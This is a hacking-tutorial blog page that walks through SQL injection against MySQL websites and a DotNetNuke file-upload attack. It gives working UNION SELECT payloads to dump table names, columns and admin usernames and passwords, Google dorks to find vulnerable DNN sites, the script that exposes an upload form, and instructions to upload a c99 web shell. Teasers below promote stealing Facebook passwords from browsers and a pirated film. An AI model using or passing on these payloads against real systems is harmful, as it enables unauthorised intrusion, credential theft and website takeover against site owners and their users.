Skip to main content

WEBSITE HACKING

watermarked-computer-virus 

 

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Portal Hacking (DNN) Technique:-

       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx

You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:
you will find many sites, Select the site which you are comfortable with.

Step 4:
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

 

3

 

Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will Find the Upload Option

 

4

 

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.

Done..!!

Blogger Labels: WEBSITE,Injection,MySQL,Databases,injections,database,layer,techniques,Oracle,tutorial,Step,vulnerabilities,Once,example,error,argument,resource,columns,difference,version,user,column,admin,IMPORTANT,UNION,SELECT,FROM,Remember,information,passwords,member,password,data,Here,Portal,Technique,method,engine,Google,Dorks,portals,Default,requirement,Providers,HtmlEditorProviders,Vulnerable,Home,Language,Link,Gallary,Dont,Simple,Script,__doPostBack,Find,Upload,Option,Root,Shell,Images,JAVA,File,Penulis,table_name,information_schema,group_concat,column_name,table_schema,username,inurl,tabid,aspx,dork,fcklinkgallery

Comments

Have a look!

Norton Internet Security 2013 20.0.0.39

 Norton Internet Security 2013 20.0.0.39 Norton Internet Security 2013 provides an early look at the next generation of Symantec's security suite. There are no major changes this time around - at least, not yet, and not that we've spotted. The most significant and obvious tweaks have been made to the interface. The style is similar to the previous edition, but it's been optimised for touch (and if you install the package on Windows 8, can now be controlled via a Metro app). Support for hardware acceleration should improve its responsiveness, too. The program does also provide improvements in protection, although they're mostly out of sight. The Insight file reputation database is now updated more rapidly, for instance; Insight technology has been incorporated into the firewall to "improve the ability to detect and block malicious network activity"; SONAR now works in Safe Mode to detect more threats via their behaviour; and Internet Security 2013 c

Gangs of Wasseypur II (2012) DVDScr 650mb

Storyline: Wasseypur is no more the town that was once consumed by the raging war between Sardar Khan and Ramadhir Singh. It has spawned a new generation of money squandering lobbyists, turning into foolhardy gangs overnight. With illegal profiteering through scrap trade auctions over the Internet, corrupt government officials, election rigging and hooliganism, the town got murkier. Everyone wants alliance with the most powerful man of Wasseypur, Faizal Khan. His sole ambition however, is to annihilate Ramadhir Singh, the man with the grand scheme. Gangs of Wasseypur-Part 2 is a fitting conclusion to this story of vengeance, which by now, not just the family but also this town has come to inherit. Movie Info: http://www.imdb.com/title/tt2284926/ [TITLE]…………………….[ Gangs of Wasseypur II [DIRECTOR]………………….[ Anurag Kashyap [RELEASE DATE]………………[ 8 August 2012 (India) [FORMAT]:…………………..[ Matroska (MKV) [GENRE]:……………………[ Action | Crime | Drama [NO OF CDs]…………………[ 1 [FILE SIZE]:……

How To Hack Facebook Account-PART-2- The Web Browser Attack

PART 1 LINK In this following post  ll discus with you about  how you can hack facebook account  using tools that can attack web browser's password safe. Each web browser has feature of storing passwords, every browser first encrypts that password and then stores it in password database but the fact is that their encryption method is so weak that these tools can retrieve passwords  from them with or without master password enabled. They can sometimes retrieve passwords even from cookies and caches stored by web browsers that means you only need your victim to use web browser at least for once. Here I am providing you link to those tools along with small description as per by their manufactures, all of them are free and one click and output ready tools, surely they don't require tutorials just because result is obtained just by a single click. Facebook Password Decryptor: FacebookPasswordDecryptor is the FREE software to instantly recover stored Facebook acc